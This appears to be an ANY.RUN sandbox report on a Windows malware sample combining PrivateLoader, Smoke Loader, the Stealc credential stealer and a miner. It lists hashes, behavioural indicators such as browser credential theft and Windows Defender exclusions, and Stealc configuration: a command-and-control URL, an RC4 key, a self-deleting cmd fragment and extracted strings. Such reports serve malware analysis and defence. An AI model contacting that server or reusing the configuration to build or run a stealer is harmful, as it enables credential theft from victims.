Malware analysis 629e031747e94b66f85f83711433a1c3d084ac0a57fbcc58f970be04de2d48cb.exe Malicious activity

Add for printing

File name:	629e031747e94b66f85f83711433a1c3d084ac0a57fbcc58f970be04de2d48cb.exe
Full analysis:	https://app.any.run/tasks/a4ec2383-1ceb-484b-9a62-8daad5377013
Verdict:	Malicious activity
Threats:	A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection. Crypto mining malware is a resource-intensive threat that infiltrates computers with the purpose of mining cryptocurrencies. This type of threat can be deployed either on an infected machine or a compromised website. In both cases the miner will utilize the computing power of the device and its network bandwidth. PrivateLoader is a malware family that is specifically created to infect computer systems and drop additional malicious programs. It operates using a pay-per-install business model, which means that the individuals behind it are paid for each instance of successful deployment of different types of harmful programs, including trojans, stealers, and other ransomware. The main function of Smoke Loader is dropping other, more destructive malware on infected machines. However, unlike many competing loaders, this one can be extended via plugins to feature destructive, malicious info-stealing functions. Stealc is a stealer malware that targets victims’ sensitive data, which it exfiltrates from browsers, messaging apps, and other software. The malware is equipped with advanced features, including fingerprinting, control panel, evasion mechanisms, string obfuscation, etc. Stealc establishes persistence and communicates with its C2 server through HTTP POST requests. Stealc ist eine Stealer-Malware, die es auf die sensiblen Daten der Opfer abgesehen hat, die sie aus Browsern, Messaging-Apps und anderer Software exfiltriert. Die Malware ist mit fortschrittlichen Funktionen ausgestattet, darunter Fingerprinting, Bedienfeld, Umgehungsmechanismen, String-Verschleierung usw. Stealc stellt eine Persistenz her und kommuniziert mit seinem C2-Server über HTTP-POST-Anfragen. Stealers are a group of malicious software that are intended for gaining unauthorized access to users’ information and transferring it to the attacker. The stealer malware category includes various types of programs that focus on their particular kind of data, including files, passwords, and cryptocurrency. Stealers are capable of spying on their targets by recording their keystrokes and taking screenshots. This type of malware is primarily distributed as part of phishing campaigns. Malware Trends Tracker >>>
Analysis date:	January 05, 2024, 13:06:26
OS:	Windows 7 Professional Service Pack 1 (build: 7601, 64 bit)
Tags:	evasion privateloader loader stealer stealc miner smoke smokeloader
Indicators:
MIME:	application/x-dosexec
File info:	PE32+ executable (GUI) x86-64, for MS Windows
MD5:	D8D52A95B809C586AFE1BBF5373EDFC4
SHA1:	4081F7D0211614DF482969BA5AF1F29E5AB2BEE7
SHA256:	629E031747E94B66F85F83711433A1C3D084AC0A57FBCC58F970BE04DE2D48CB
SSDEEP:	98304:NOxI+diXhOFO76AwMG20rfwTmgXwZl9sdVCdqksQ18E+jOIjyN+VtmKNhBrqNTY4:fwUm2ikgoeSUaZm5dCa

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

Launch configuration

Task duration:: 120 seconds
Heavy Evasion option:
Network geolocation:: off
Additional time used:: none
MITM proxy:: off
Privacy:: Public submission
Fakenet option:: off
Route via Tor:: off
Autoconfirmation of UAC:: on
Network:: on

Software preset

Internet Explorer 11.0.9600.18860 KB4052978
Adobe Acrobat Reader DC MUI (15.007.20033)
Adobe Flash Player 27 ActiveX (27.0.0.187)
Adobe Flash Player 27 NPAPI (27.0.0.187)
Adobe Flash Player 27 PPAPI (27.0.0.187)
CCleaner (5.35)
Google Chrome (109.0.5414.120)
Google Update Helper (1.3.33.23)
Java 8 Update 92 (64-bit) (8.0.920.14)
Java Auto Updater (2.8.92.14)
Microsoft .NET Framework 4.8 (4.8.03761)
Microsoft .NET Framework 4.8 (4.8.03761)
Microsoft Edge (109.0.1518.115)
Microsoft Edge Update (1.3.177.11)
Microsoft Office Access MUI (English) 2010 (14.0.4763.1000)
Microsoft Office Access MUI (French) 2010 (14.0.4763.1000)
Microsoft Office Access MUI (German) 2010 (14.0.4763.1000)
Microsoft Office Access MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office Access MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office Access MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office Access MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office Access MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office Access MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office Access MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office Access Setup Metadata MUI (English) 2010 (14.0.4763.1000)
Microsoft Office Excel MUI (English) 2010 (14.0.4763.1000)
Microsoft Office Excel MUI (French) 2010 (14.0.4763.1000)
Microsoft Office Excel MUI (German) 2010 (14.0.4763.1000)
Microsoft Office Excel MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office Excel MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office Excel MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office Excel MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office Excel MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office Excel MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office Excel MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office Groove MUI (French) 2010 (14.0.4763.1000)
Microsoft Office Groove MUI (German) 2010 (14.0.4763.1000)
Microsoft Office Groove MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office Groove MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office Groove MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office Groove MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office Groove MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office Groove MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office Groove MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office IME (Japanese) 2010 (14.0.4763.1000)
Microsoft Office IME (Japanese) 2010 (14.0.4763.1000)
Microsoft Office IME (Korean) 2010 (14.0.4763.1000)
Microsoft Office IME (Korean) 2010 (14.0.4763.1000)
Microsoft Office InfoPath MUI (French) 2010 (14.0.4763.1000)
Microsoft Office InfoPath MUI (German) 2010 (14.0.4763.1000)
Microsoft Office InfoPath MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office InfoPath MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office InfoPath MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office InfoPath MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office InfoPath MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office InfoPath MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office InfoPath MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office Language Pack 2010 - French/Français (14.0.4763.1000)
Microsoft Office Language Pack 2010 - German/Deutsch (14.0.4763.1000)
Microsoft Office Language Pack 2010 - Italian/Italiano (14.0.4763.1000)
Microsoft Office Language Pack 2010 - Japanese/日本語 (14.0.4763.1000)
Microsoft Office Language Pack 2010 - Korean/한국어 (14.0.4763.1000)
Microsoft Office Language Pack 2010 - Portuguese/Português (Brasil) (14.0.4763.1000)
Microsoft Office Language Pack 2010 - Russian/русский (14.0.4763.1000)
Microsoft Office Language Pack 2010 - Spanish/Español (14.0.4763.1000)
Microsoft Office Language Pack 2010 - Turkish/Türkçe (14.0.4763.1013)
Microsoft Office O MUI (French) 2010 (14.0.4763.1000)
Microsoft Office O MUI (German) 2010 (14.0.4763.1000)
Microsoft Office O MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office O MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office O MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office O MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office O MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office O MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office O MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office Office 32-bit Components 2010 (14.0.4763.1000)
Microsoft Office OneNote MUI (English) 2010 (14.0.4763.1000)
Microsoft Office OneNote MUI (French) 2010 (14.0.4763.1000)
Microsoft Office OneNote MUI (German) 2010 (14.0.4763.1000)
Microsoft Office OneNote MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office OneNote MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office OneNote MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office OneNote MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office OneNote MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office OneNote MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office OneNote MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office Outlook MUI (English) 2010 (14.0.4763.1000)
Microsoft Office Outlook MUI (French) 2010 (14.0.4763.1000)
Microsoft Office Outlook MUI (German) 2010 (14.0.4763.1000)
Microsoft Office Outlook MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office Outlook MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office Outlook MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office Outlook MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office Outlook MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office Outlook MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office Outlook MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office PowerPoint MUI (English) 2010 (14.0.4763.1000)
Microsoft Office PowerPoint MUI (French) 2010 (14.0.4763.1000)
Microsoft Office PowerPoint MUI (German) 2010 (14.0.4763.1000)
Microsoft Office PowerPoint MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office PowerPoint MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office PowerPoint MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office PowerPoint MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office PowerPoint MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office PowerPoint MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office PowerPoint MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office Professional 2010 (14.0.4763.1000)
Microsoft Office Proof (Arabic) 2010 (14.0.4763.1000)
Microsoft Office Proof (Basque) 2010 (14.0.4763.1000)
Microsoft Office Proof (Catalan) 2010 (14.0.4763.1000)
Microsoft Office Proof (Dutch) 2010 (14.0.4763.1000)
Microsoft Office Proof (English) 2010 (14.0.4763.1000)
Microsoft Office Proof (French) 2010 (14.0.4763.1000)
Microsoft Office Proof (Galician) 2010 (14.0.4763.1000)
Microsoft Office Proof (German) 2010 (14.0.4763.1000)
Microsoft Office Proof (Italian) 2010 (14.0.4763.1000)
Microsoft Office Proof (Japanese) 2010 (14.0.4763.1000)
Microsoft Office Proof (Korean) 2010 (14.0.4763.1000)
Microsoft Office Proof (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office Proof (Russian) 2010 (14.0.4763.1000)
Microsoft Office Proof (Spanish) 2010 (14.0.4763.1000)
Microsoft Office Proof (Turkish) 2010 (14.0.4763.1013)
Microsoft Office Proof (Ukrainian) 2010 (14.0.4763.1000)
Microsoft Office Proofing (English) 2010 (14.0.4763.1000)
Microsoft Office Proofing (French) 2010 (14.0.4763.1000)
Microsoft Office Proofing (German) 2010 (14.0.4763.1000)
Microsoft Office Proofing (Italian) 2010 (14.0.4763.1000)
Microsoft Office Proofing (Japanese) 2010 (14.0.4763.1000)
Microsoft Office Proofing (Korean) 2010 (14.0.4763.1000)
Microsoft Office Proofing (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office Proofing (Russian) 2010 (14.0.4763.1000)
Microsoft Office Proofing (Spanish) 2010 (14.0.4763.1000)
Microsoft Office Proofing (Turkish) 2010 (14.0.4763.1013)
Microsoft Office Publisher MUI (English) 2010 (14.0.4763.1000)
Microsoft Office Publisher MUI (French) 2010 (14.0.4763.1000)
Microsoft Office Publisher MUI (German) 2010 (14.0.4763.1000)
Microsoft Office Publisher MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office Publisher MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office Publisher MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office Publisher MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office Publisher MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office Publisher MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office Publisher MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office SharePoint Designer MUI (French) 2010 (14.0.4763.1000)
Microsoft Office SharePoint Designer MUI (German) 2010 (14.0.4763.1000)
Microsoft Office SharePoint Designer MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office SharePoint Designer MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office SharePoint Designer MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office SharePoint Designer MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office SharePoint Designer MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office SharePoint Designer MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office SharePoint Designer MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office Shared 32-bit MUI (English) 2010 (14.0.4763.1000)
Microsoft Office Shared 32-bit MUI (French) 2010 (14.0.4763.1000)
Microsoft Office Shared 32-bit MUI (German) 2010 (14.0.4763.1000)
Microsoft Office Shared 32-bit MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office Shared 32-bit MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office Shared 32-bit MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office Shared 32-bit MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office Shared 32-bit MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office Shared 32-bit MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office Shared 32-bit MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office Shared MUI (English) 2010 (14.0.4763.1000)
Microsoft Office Shared MUI (French) 2010 (14.0.4763.1000)
Microsoft Office Shared MUI (German) 2010 (14.0.4763.1000)
Microsoft Office Shared MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office Shared MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office Shared MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office Shared MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office Shared MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office Shared MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office Shared MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office Shared Setup Metadata MUI (English) 2010 (14.0.4763.1000)
Microsoft Office Single Image 2010 (14.0.4763.1000)
Microsoft Office Word MUI (English) 2010 (14.0.4763.1000)
Microsoft Office Word MUI (French) 2010 (14.0.4763.1000)
Microsoft Office Word MUI (German) 2010 (14.0.4763.1000)
Microsoft Office Word MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office Word MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office Word MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office Word MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office Word MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office Word MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office Word MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office X MUI (French) 2010 (14.0.4763.1000)
Microsoft Office X MUI (German) 2010 (14.0.4763.1000)
Microsoft Office X MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office X MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office X MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office X MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office X MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office X MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office X MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Visual C++ 2005 Redistributable (x64) (8.0.61000)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (9.0.30729.6161)
Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (10.0.40219)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (11.0.61030.0)
Microsoft Visual C++ 2012 x64 Additional Runtime - 11.0.61030 (11.0.61030)
Microsoft Visual C++ 2012 x64 Minimum Runtime - 11.0.61030 (11.0.61030)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (12.0.30501.0)
Microsoft Visual C++ 2013 x64 Additional Runtime - 12.0.21005 (12.0.21005)
Microsoft Visual C++ 2013 x64 Minimum Runtime - 12.0.21005 (12.0.21005)
Microsoft Visual C++ 2015-2022 Redistributable (x64) - 14.36.32532 (14.36.32532.0)
Microsoft Visual C++ 2015-2022 Redistributable (x86) - 14.36.32532 (14.36.32532.0)
Microsoft Visual C++ 2022 X64 Additional Runtime - 14.36.32532 (14.36.32532)
Microsoft Visual C++ 2022 X64 Minimum Runtime - 14.36.32532 (14.36.32532)
Microsoft Visual C++ 2022 X86 Additional Runtime - 14.36.32532 (14.36.32532)
Microsoft Visual C++ 2022 X86 Minimum Runtime - 14.36.32532 (14.36.32532)
Mozilla Firefox (x64 en-US) (115.0.2)
Mozilla Maintenance Service (115.0.2)
Notepad++ (64-bit x64) (7.5.1)
PowerShell 7-x64 (7.2.11.0)
Skype version 8.100 (8.100)
Update for Microsoft .NET Framework 4.8 (KB4503575) (1)
VLC media player (2.2.6)
WinRAR 5.60 (64-bit) (5.60.0)

Add for printing

MALICIOUS
- Actions looks like stealing of personal data
  - 629e031747e94b66f85f83711433a1c3d084ac0a57fbcc58f970be04de2d48cb.exe (PID: 3056)
  - nsgAD1D.tmp (PID: 2484)
- Creates a writable file in the system directory
  - 629e031747e94b66f85f83711433a1c3d084ac0a57fbcc58f970be04de2d48cb.exe (PID: 3056)
  - powershell.exe (PID: 964)
- Uses Task Scheduler to autorun other applications
  - powershell.exe (PID: 972)
  - powershell.exe (PID: 2104)
- Runs injected code in another process
  - toolspub2.exe (PID: 2452)
- Steals credentials from Web Browsers
  - nsgAD1D.tmp (PID: 2484)
- Starts CMD.EXE for self-deleting
  - nsgAD1D.tmp (PID: 2484)
- STEALC has been detected (YARA)
  - nsgAD1D.tmp (PID: 2484)
SUSPICIOUS
- Reads settings of System Certificates
  - 629e031747e94b66f85f83711433a1c3d084ac0a57fbcc58f970be04de2d48cb.exe (PID: 3056)
- Reads security settings of Internet Explorer
  - 629e031747e94b66f85f83711433a1c3d084ac0a57fbcc58f970be04de2d48cb.exe (PID: 3056)
- Reads the Internet Settings
  - Jmvp_d6dvInBM8B8O47ZK6Sv.exe (PID: 3032)
  - 629e031747e94b66f85f83711433a1c3d084ac0a57fbcc58f970be04de2d48cb.exe (PID: 3056)
  - InstallSetup8.exe (PID: 2084)
  - powershell.exe (PID: 760)
  - nsgAD1D.tmp (PID: 2484)
- Checks Windows Trust Settings
  - 629e031747e94b66f85f83711433a1c3d084ac0a57fbcc58f970be04de2d48cb.exe (PID: 3056)
- Starts application with an unusual extension
  - InstallSetup8.exe (PID: 2084)
- Uses powercfg.exe to modify the power settings
  - cmd.exe (PID: 2376)
  - cmd.exe (PID: 1176)
- Starts SC.EXE for service management
  - cmd.exe (PID: 1036)
  - cmd.exe (PID: 480)
- Searches for installed software
  - nsgAD1D.tmp (PID: 2484)
- Drops a system driver (possible attempt to evade defenses)
  - updater.exe (PID: 2144)
- Uses TIMEOUT.EXE to delay execution
  - cmd.exe (PID: 2800)
- The process verifies whether the antivirus software is installed
  - nsgAD1D.tmp (PID: 2484)
- Starts CMD.EXE for commands execution
  - nsgAD1D.tmp (PID: 2484)
- Reads browser cookies
  - nsgAD1D.tmp (PID: 2484)
INFO
- Drops the executable file immediately after the start
  - 629e031747e94b66f85f83711433a1c3d084ac0a57fbcc58f970be04de2d48cb.exe (PID: 3056)
  - Jmvp_d6dvInBM8B8O47ZK6Sv.exe (PID: 3032)
  - InstallSetup8.exe (PID: 2084)
  - obpv7W2EtHKLDkr1kzO1X_In.exe (PID: 3044)
  - updater.exe (PID: 2144)
  - nsgAD1D.tmp (PID: 2484)
  - BroomSetup.exe (PID: 2328)
- Checks supported languages
  - 629e031747e94b66f85f83711433a1c3d084ac0a57fbcc58f970be04de2d48cb.exe (PID: 3056)
  - InstallSetup8.exe (PID: 2084)
  - toolspub2.exe (PID: 288)
  - Jmvp_d6dvInBM8B8O47ZK6Sv.exe (PID: 3032)
  - e0cbefcb1af40c7d4aff4aca26621a98.exe (PID: 624)
  - obpv7W2EtHKLDkr1kzO1X_In.exe (PID: 3044)
  - BroomSetup.exe (PID: 2328)
  - nsgAD1D.tmp (PID: 2484)
  - updater.exe (PID: 2144)
  - toolspub2.exe (PID: 2452)
- Reads the computer name
  - 629e031747e94b66f85f83711433a1c3d084ac0a57fbcc58f970be04de2d48cb.exe (PID: 3056)
  - InstallSetup8.exe (PID: 2084)
  - Jmvp_d6dvInBM8B8O47ZK6Sv.exe (PID: 3032)
  - BroomSetup.exe (PID: 2328)
  - e0cbefcb1af40c7d4aff4aca26621a98.exe (PID: 624)
  - nsgAD1D.tmp (PID: 2484)
- Checks proxy server information
  - 629e031747e94b66f85f83711433a1c3d084ac0a57fbcc58f970be04de2d48cb.exe (PID: 3056)
  - InstallSetup8.exe (PID: 2084)
  - nsgAD1D.tmp (PID: 2484)
- Create files in a temporary directory
  - Jmvp_d6dvInBM8B8O47ZK6Sv.exe (PID: 3032)
  - InstallSetup8.exe (PID: 2084)
- Process checks computer location settings
  - 629e031747e94b66f85f83711433a1c3d084ac0a57fbcc58f970be04de2d48cb.exe (PID: 3056)
- Reads the machine GUID from the registry
  - 629e031747e94b66f85f83711433a1c3d084ac0a57fbcc58f970be04de2d48cb.exe (PID: 3056)
  - InstallSetup8.exe (PID: 2084)
  - e0cbefcb1af40c7d4aff4aca26621a98.exe (PID: 624)
  - nsgAD1D.tmp (PID: 2484)
- Connects to the CnC server
  - 629e031747e94b66f85f83711433a1c3d084ac0a57fbcc58f970be04de2d48cb.exe (PID: 3056)
  - nsgAD1D.tmp (PID: 2484)
- Process requests binary or script from the Internet
  - 629e031747e94b66f85f83711433a1c3d084ac0a57fbcc58f970be04de2d48cb.exe (PID: 3056)
  - InstallSetup8.exe (PID: 2084)
  - nsgAD1D.tmp (PID: 2484)
- Checks for external IP
  - 629e031747e94b66f85f83711433a1c3d084ac0a57fbcc58f970be04de2d48cb.exe (PID: 3056)
  - InstallSetup8.exe (PID: 2084)
- PRIVATELOADER has been detected (SURICATA)
  - 629e031747e94b66f85f83711433a1c3d084ac0a57fbcc58f970be04de2d48cb.exe (PID: 3056)
- Connects to the server without a host name
  - 629e031747e94b66f85f83711433a1c3d084ac0a57fbcc58f970be04de2d48cb.exe (PID: 3056)
  - InstallSetup8.exe (PID: 2084)
  - nsgAD1D.tmp (PID: 2484)
- Creates files or folders in the user directory
  - 629e031747e94b66f85f83711433a1c3d084ac0a57fbcc58f970be04de2d48cb.exe (PID: 3056)
  - InstallSetup8.exe (PID: 2084)
  - nsgAD1D.tmp (PID: 2484)
- Manual execution by a user
  - powershell.exe (PID: 760)
  - cmd.exe (PID: 1036)
  - cmd.exe (PID: 2376)
  - schtasks.exe (PID: 1636)
  - powershell.exe (PID: 972)
  - cmd.exe (PID: 480)
  - powershell.exe (PID: 2104)
  - cmd.exe (PID: 1176)
  - conhost.exe (PID: 2304)
  - explorer.exe (PID: 2580)
  - powershell.exe (PID: 964)
- Executes as Windows Service
  - raserver.exe (PID: 2128)
- Starts POWERSHELL.EXE for commands execution
  - explorer.exe (PID: 2004)
- Script adds exclusion path to Windows Defender
  - explorer.exe (PID: 2004)
- Adds path to the Windows Defender exclusion list
  - explorer.exe (PID: 2004)
- Starts CMD.EXE for commands execution
  - explorer.exe (PID: 2004)
- The process executes via Task Scheduler
  - updater.exe (PID: 2144)
- Creates files in the program directory
  - obpv7W2EtHKLDkr1kzO1X_In.exe (PID: 3044)
  - nsgAD1D.tmp (PID: 2484)
  - updater.exe (PID: 2144)
- Application launched itself
  - toolspub2.exe (PID: 288)
- Uses Task Scheduler to run other applications
  - explorer.exe (PID: 2004)
- Reads product name
  - nsgAD1D.tmp (PID: 2484)
- STEALC has been detected (SURICATA)
  - nsgAD1D.tmp (PID: 2484)
- Reads CPU info
  - nsgAD1D.tmp (PID: 2484)
- Reads Environment values
  - nsgAD1D.tmp (PID: 2484)
- Unusual connection from system programs
  - powershell.exe (PID: 964)
- Steals credentials
  - nsgAD1D.tmp (PID: 2484)
- Application was injected by another process
  - explorer.exe (PID: 2004)
- The process drops Mozilla's DLL files
  - nsgAD1D.tmp (PID: 2484)
- Connects to unusual port
  - explorer.exe (PID: 2580)
- The process drops C-runtime libraries
  - nsgAD1D.tmp (PID: 2484)
- The Powershell connects to the Internet
  - powershell.exe (PID: 964)
- SMOKE has been detected (SURICATA)
  - explorer.exe (PID: 2004)
- Process drops legitimate windows executable
  - nsgAD1D.tmp (PID: 2484)
- Reads the Internet Settings
  - explorer.exe (PID: 2004)

Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report

Add for printing

Stealc

(PID) Process(2484) nsgAD1D.tmp

C2http://185.172.128.79/3886d2276f6914c4.php

Keys

RC42673782774813489983097231025

Strings (433)N|E/XOJt

wdqhEEW=*MC}

!l^8pIw

" & del "C:\ProgramData\*.dll"" & exit

#9R-R]Ty

#Y{,lV,rN&QMF

#z|uX<

%08lX%04lX%lu

%APPDATA%

%DESKTOP%

%DOCUMENTS%

%LOCALAPPDATA%

%RECENT%

%ROGRAMFILES%

%ROGRAMFILES_86%

%USERPROFILE%

%d/%d/%d %d:%d:%d

%hu/%hu/%hu

')Y$(|YiiCC>

')]Q^GhPtP

')c_UC$El2XQ

'GstbSzBI+C[s6CF

'Hg/zaiOu.}qL`

'qtAYw

(Q~,',4=Xq

(RE e#'V,IF

(qlE'N6KHo

)YFYZK

){.!lQQ|)7C

*(,QQXl

*.ini

*.lnk

*.tox

+f0UDMHa

+qxsz{PF\1y

,Cyo^|@Ft @

,uyHDLD0:

- Architecture:

- CPU:

- Computer Name:

- Cores:

- Country: ISO?

- Display Resolution:

- GPU:

- HWID:

- IP: IP?

- Keyboards:

- Language:

- Laptop:

- Local Time:

- OS:

- RAM:

- Running Path:

- Threads:

- UTC:

- UserName:

.exe

.txt

/'Jl,<R)K[H.

/3886d2276f6914c4.php

/78gYLGFX:y*sD\n

/U~c^jt2wT"

/c start

/c timeout /t 5 & del /f /q "

/f059ec3d7eb90876/

/wAP$/?M9/qz

00000001

00000002

00000003

00000004

0e|]_TT@

1cN]

3'rtL~BBxG

3WO]n/JIS4\z

49"N%Dr&T4GR<

4sr*YcbR6TS6O

5NyJx/dW@\xW]e}>d"Z

6d.f|Qx[Z-9

7(pb_E\@1F

7Itg.UqP

7r]}@ZFQG}W

7v?v&Ujz{

7|^2-_t1t/@

84yGM{$\_

9b*}OLVV;Xn

9dJ,SkIw

;'s~6[s

;8SmOLa

;RC;w5z_<

;i8m}(C]h<Tpy

;xF+?JTrW

?5gXCYhRtR@

?Lg*U|ZR_{u

?Y9{3(y>(2:RELP/

?{Q<L

@OH%fqg

A7FDF864FBC10B77*

A92DAA6EA6F891F2*

ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890

All Users:

BCryptCloseAlgorithmProvider

BCryptDecrypt

BCryptDestroyKey

BCryptGenerteSymmetricKey

BCryptOpenAlgorithmProvider

BCryptSetProperty

BitBlt

C:\ProgramDta\

C:\ProgramDta\nss3.dll

C:\Windows\system32\cmd.exe

CURRENT

CharToOemW

CloseHandle

CloseWindow

CoCreateInstance

CoInitialize

CoUninitialize

Content-Disposition: form-data; name="

Content-Type: multipart/form-data; boundary=----

CopyFileA

CreateCompatibleBitmap

CreateCompatibleDC

CreateDCA

CreateEventA

CreateFileA

CreateStreamOnHGlobal

CreateToolhelp32Snapshot

CryptBinaryToStringA

CryptStringToBinaryA

CryptUnprotectData

Current User:

D877F783D5D3EF8C*

DISPLAY

DeleteFileA

DeleteObject

DialogConfig.vdf

DialogConfigOverlay*.vdf

DisplayName

DisplayVersion

E-AQ{.}1[9

EnumDisplayDevicesA

ExitProcess

F8806DD0C461824F*

FALSE

FindClose

FindFirstFileA

FindNextFileA

FreeLibrary

Fx,K4qtP

GdipCreateBitmapFromHBITMAP

GdipDisposeImage

GdipFree

GdipGetImageEncoders

GdipGetImageEncodersSize

GdipSaveImageToStream

GdiplusShutdown

GdiplusStartup

GetComputerNameA

GetCurrentProcess

GetCurrentProcessId

GetDC

GetDesktopWindow

GetDeviceCaps

GetEnvironmentVariableA

GetFileAttributesA

GetFileSize

GetFileSizeEx

GetHGlobalFromStream

GetKeyboardLayoutList

GetLastError

GetLocalTime

GetLocaleInfoA

GetLogicalProcessorInformationEx

GetModuleFileNameA

GetModuleFileNameExA

GetProcAddress

GetProcessHeap

GetSystemInfo

GetSystemPowerStatus

GetSystemTime

GetTimeZoneInformation

GetUserDefaultLangID

GetUserDefaultLocaleName

GetUserNameA

GetVolumeInformationA

GetWindowRect

GetWindowsDirectoryA

GlobalAlloc

GlobalFree

GlobalLock

GlobalMemoryStatusEx

GlobalSize

H,<^[u0

H5cEO<Atl

HAL9TH

HARDWARE\DESCRIPTION\System\CentralProcessor\0

HTTP/1.1

HeapAlloc

HeapFree

History

HpSYh[F-H_

HttpOpenRequestA

HttpSendRequestA

HzUw{ED>

IcU>2AACDS

IndexedDB

Installed Apps:

